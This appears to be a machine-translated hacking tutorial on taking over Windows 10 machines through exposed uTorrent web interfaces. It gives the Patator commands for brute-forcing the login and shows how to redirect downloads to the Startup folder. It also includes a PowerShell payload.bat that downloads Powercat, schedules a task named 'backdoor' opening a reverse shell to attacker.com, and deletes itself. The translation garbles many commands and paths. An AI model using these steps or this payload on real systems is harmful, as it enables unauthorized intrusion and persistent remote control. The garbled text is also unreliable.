Committed uTorrent clients can be misused to download a malicious torrent file. The malicious file is designed to embed and execute a persistent back door when Windows 10 is restarted, allowing the attacker remote access to the operating system at will. But there are a few ways to prevent you from being a target.
Torrent clients such as uTorrent and Transmission have built-in functions that allow server administrators to access the torrent client remotely via web application interfaces, as shown in the uTorrent web app example below
In general, the number of publicly accessible torrent clients is growing. As torrent clients grow in popularity, so does the number of poorly configured and insecure services. Just like all web apps, these clients can be hacked in different ways. For example, in recent years numerous directory traversal, escalation of privileges and cross-site scripting vulnerabilities have been disclosed, as shown in the image below. In the future, attackers might discover ways to completely bypass authentication.
Understanding the attack
So a torrent client is being hacked … what's the worst thing that an attacker can do? Pirate some copyrighted materials? Well, but it's getting worse. Torrent clients can create files and folders on the system and replace existing files. That access to the file system can be misused by downloading malicious files through the compromised torrent client.
For example, an attacker could download an executable file or script to the start folder on Windows 10 computers, as shown in the GIF below. The boot folder executes all the files it detects without user interaction – every time the server or computer is restarted.
Linux systems are equally vulnerable to such attacks, but are beyond the scope of our demonstration here. The .bashrc file found in most Linux systems is essentially a Bash script that runs every time a new terminal is opened or SSH login is set. An attacker could use the compromised torrent client to download a malicious .bashrc file, replacing the original file found on the server. It would cause the .bashrc server to run from the attacker when someone successfully logs on to the server.
This article shows how uTorrent web apps can be brutally forced and used to download a PowerShell script into the Windows 10 startup folder. The PowerShell script is designed to embed a persistent back door and remove themselves immediately when completed.
Step 1: Brute Force the Login with Patator
Patator is a brute forcing tool, such as Hydra, Medusa, and Burp & # 39; s Intruder module. The use of Patator for brute-force logging in of web apps is very similar to brute-forcing router gateways. In my previous article, "Break in Router Gateways with Patator", the use of the command line and examples are described in detail.
1. Install Patator
~ # apt-get update && apt-get install patator Read package lists ... Ready Build dependency structure Read status information ... Done The following NEW packages are installed: ca-certificates-java standard-jre standard-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libferdep-client2-2 libfeerdep2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-naclon python3-naclon python python3-paramiko python3-psycopg2 unzip 0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded. Must have 43.9 MB of archives. After this operation, an additional 192 MB of disk space is used. Do you want to continue? [Y/n] Y
2. Record a logon request with Burp & # 39; s proxy
Open Firefox and Burp Suite. Configure Firefox for proxy requests via Burp and record the login request. Replace the encrypted string "Authentication: Basic" with "FILE0", right click on it and choose the "Copy to file" option. The FILE0 string acts as a placeholder for the Patator glossary. Save the request in the / tmp folder with the file name "utorrent_request.txt".
3. Generate a targeted word list
Hashes.org has published word lists with cracked passwords obtained in the last two years. The 2018 glossary, highlighted in the image below, can be downloaded by navigating to the website. That is the one we use as an example in this guide.
Unpack the archive with the 7z x archive.7z command, where "archive" is the folder and file name of the compressed file that you have downloaded. For example:
~ # 7z x /root/Downloads/hashes.org-2018.7z 7-Zip  16.02: Copyright (c) 1999-2016 Igor Pavlov: 2016-05-21 p7zip version 16.02 (locale = en_US.UTF-8, Utf16 = on, HugeFiles = on, 64 bits, 4 CPU & # 39; s Intel (R) Core (TM) i7-4770HQ CPU @ 2.20GHz (40661), ASM, AES-NI) Scan the disk for archives: 1 file, 1424620615 bytes (1359 MiB) Extract the archive: /root/Downloads/hashes.org-2018.7z - Path = /root/Downloads/hashes.org-2018.7z Type = 7z Physical size = 1424620615 Size headers = 142 Method = LZMA: 24 Solid = - Blocks = 1 Everything is alright Size: 6429547050 Compressed: 1424620615
Then code each line in the dictionary with base64. The username "admin" is the default name for uTorrent web apps. Exchange the "./hashes.org-2018.txt" folder with the location and name of your downloaded glossary.
~ # while password is being read; do printf "admin: $ password" | base64; done < ./hashes.org-2018.txt >> ./ base64_wordlist.txt
In my tests against uTorrent version 3.5.5 in Windows 10, no blacklist or speed limitation seemed to have been invoked by hundreds of thousands of failed login attempts. It seems that uTorrent allows an infinite number of login attempts over a longer period.
Use the patator command below with the utorrent_request.txt file created to brutally force uTorrent weblogins. of this step. Make sure you replace the paths below to the correct folder, because yours may be different.
~ # patator http_fuzz raw_request = / tmp / utorrent_request.txt accept_cookie = 1 follow = 1 0 =. / Base64_wordlist.txt 16:31:45 patator INFO - Patator v0.7 (https://github.com/lanjelot/patator) starting on 2020-01-29 16:31 EST
To abort that command:
- raw_request = – Use the utorrent_request.txt created in an earlier step to generate login attempts against the web app.
- accept_cookie = – Save cookies that you receive for future requests.
- follow = – Follow location redirects for both failed and successful login attempts when instructed by the server.
- 0 = – The "FILE0" designation in utorrent_request.txt runs through the offered password list.
After executing the command, my output looks like this:
code size: clen time | candidate | number of mesg -------------------------------------------------- --------------------------- 401 159: 0 0.004 | YWRtaW46ISEhbWFmZWlmZWkxMjM0NQ == | 9902 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbWFydGluYTk1 | 9912 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbWVpbnMhISE = | 9922 | HTTP / 1.1 401 Not authorized 401 159: 0 0.007 | YWRtaW46ISEhbWljaCEhIQ == | 9932 | HTTP / 1.1 401 Not authorized 401 159: 0 0.001 | YWRtaW46ISEhbW9t | 9942 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbmFpY3VMISEh | 9952 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbmV3d2F2ZQ == | 9962 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbm93YXk = | 9972 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhb29vNTIx | 9982 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhcGluayEhIQ == | 9992 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbWFyeTEyMw == | 9913 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbWVsbDI3ODE = | 9923 | HTTP / 1.1 401 Not authorized 401 159: 0 0.001 | YWRtaW46ISEhbWljaGVsbGU = | 9933 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbW9uZXk = | 9943 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbmFtYXN0ZTIy | 9953 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbmlhaXdvYnU = | 9963 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbndseTAy | 9973 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhb3N0YXAhISE = | 9983 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhcGlwa2EyMDA0ISEh | 9993 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbWFzY3VsaW5vISEh | 9915 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbWVuZzEyMw == | 9925 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbWluaW9uNTg = | 9935 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbXVja2VsMDgxNQ == | 9945 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbmFuZGExOTk1 | 9955 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbmlja2k = | 9965 | HTTP / 1.1 401 Not authorized 401 159: 0 0.000 | YWRtaW46ISEhbzc3M2g = | 9975 | HTTP / 1.1 401 Not authorized 200 42340: 42176 0.073 | YWRtaW46UGFTU3dvUkRAMTIzNA == | 9985 | HTTP / 1.1 200 OK 401 159: 0 0.004 | YWRtaW46ISEhcG9wOTI = | 9995 | HTTP / 1.1 401 Not authorized Hits / Done / Skip / Fail / Size: 10000/10000/0/0/10000, Avg: 1607 r / s, Time: 0 h 0 m 6 s
Failed login attempts can be filtered out. Successful registrations can be decoded with base64 . For example:
~ # base64 -d <<< & # 39; YWRtaW46UGFTU3dvUkRAMTIzNA == & # 39; admin: PaSSwoRD @ 1234
Step 2: Change the default download folder
After accessing the torrent client, if there are no active downloads, simply add a torrent file and click on the " General "to identify the user name on the Windows system. The torrent can be removed after the username is discovered.
Open the "Preferences" and click on the "Folders" tab. Check the "New downloads in" button and enter the next boot folder.
AppData Roaming Microsoft Windows Start Menu Programs Startup
Make sure that you have  with the Windows 10 username.
The PowerShell script (payload.bat) will have a persistent back door with the command schtasks and remove the proof of itself from the Startup folder.
This is just an example of a PowerShell payload. The script can perform a wide range of automated attacks, such as sensitive file filtration, desktop live streaming, password dumping and converting the device to a web proxy.
There are several rules in the PowerShell payload below. Comments have been added to explain what each rule does.
# A new folder is created with the name "Windows" in an attempt to # hide a malicious script. mkdir "C: Users $ env: username Windows" # Invoke-WebRequest is used to download Powercat, a Netcat-like one # PowerShell module. The Powercat script is stored in the # new folder "Windows". iwr & # 39; https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1' -O C: Users $ env: username Windows powercat.ps1 # The schtasks command is executed to create a new scheduled task # called "back door". The task imports the Powercat script # and try to establish a TCP connection to the attacker's system # every time the Windows 10 computer becomes inactive. schtasks / create / f / tn backdoor / tr & # 39; powershell / w 1 -ep bypass / C ipmo C: Users $ env: username Windows powercat.ps1; powercat -c attacker.com -p 9999 -e powershell & # 39; / sc onidle / i 1 # The payload.bat is deleted from the boot folder. rm C: Users $ env: username AppData Roaming Microsoft Windows Start` Menu Program & # 39; s Startup payload.bat
Create a folder named "torrent" with the command mkdir .
~ # mkdir torrent /
Go to the new folder.
~ # cd torrent / ~ / torrent #
The above payload is summarized in one line, chained together by semicolons & # 39; s, with which Windows 10 can execute all desired code neatly as a single command.
Use nano to create a new "payload.bat" file:
~ / torrent # nano payload.bat
And save the PowerShell script below in the file:
powershell -ep bypass / w 1 "& mkdir C: Users $ env: username Windows; iwr & # 39; https: //raw.githubusercontent.com/besimorhino/powercat/master/powercat. ps1 & # 39; -OC: Users $ env: username Windows powercat.ps1; schtasks / create / f / tn backdoor / tr & # 39; powershell / w 1 -ep bypass / C ipmo C: Users $ env: username Windows powercat.ps1; powercat -c attacker.com -p 9999 -e powershell & # 39; / sc onidle / i 1; rm C: Users $ env: username AppData Roaming Microsoft Windows Start` Menu Programs & # 39; s Startup payload.bat "
Note the serious accent (` ) in the "Start` Menu" file path. This is not a typo. The serious accent character is a solution to escape from spaces.
Download the qbittorrent client in a new terminal window in Kali. Most torrent applications allow torrent creation, but the transmission gtk client could not create the .torrent file in my tests, so it is not recommended.
~ # apt-get update && apt-get install qBittorrent Hit: 1 https://mirrors.ocf.berkeley.edu/kali kali-rolling InRelease Read package lists ... Ready Read package lists ... Ready Build dependency structure Read status information ... Done The following NEW packages are installed: libboost-random1.67.0 libtorrent-rasterbar9 qbittorrent 0 upgraded, 3 newly installed, 0 to remove and 185 not upgraded. Must have 7,051 kB of archives. After this operation, 15.2 MB of additional disk space is used. Do you want to continue? [Y/n]
Open qBitttorrent. Click the "Extra" button in the menu bar and then "Torrent Creator" to open the Torrent Creator window.
Change the path to the payload.bat file, check the "Start seeding immediately" button, add tracker URL & # 39; s and click on the "Create Torrent" button.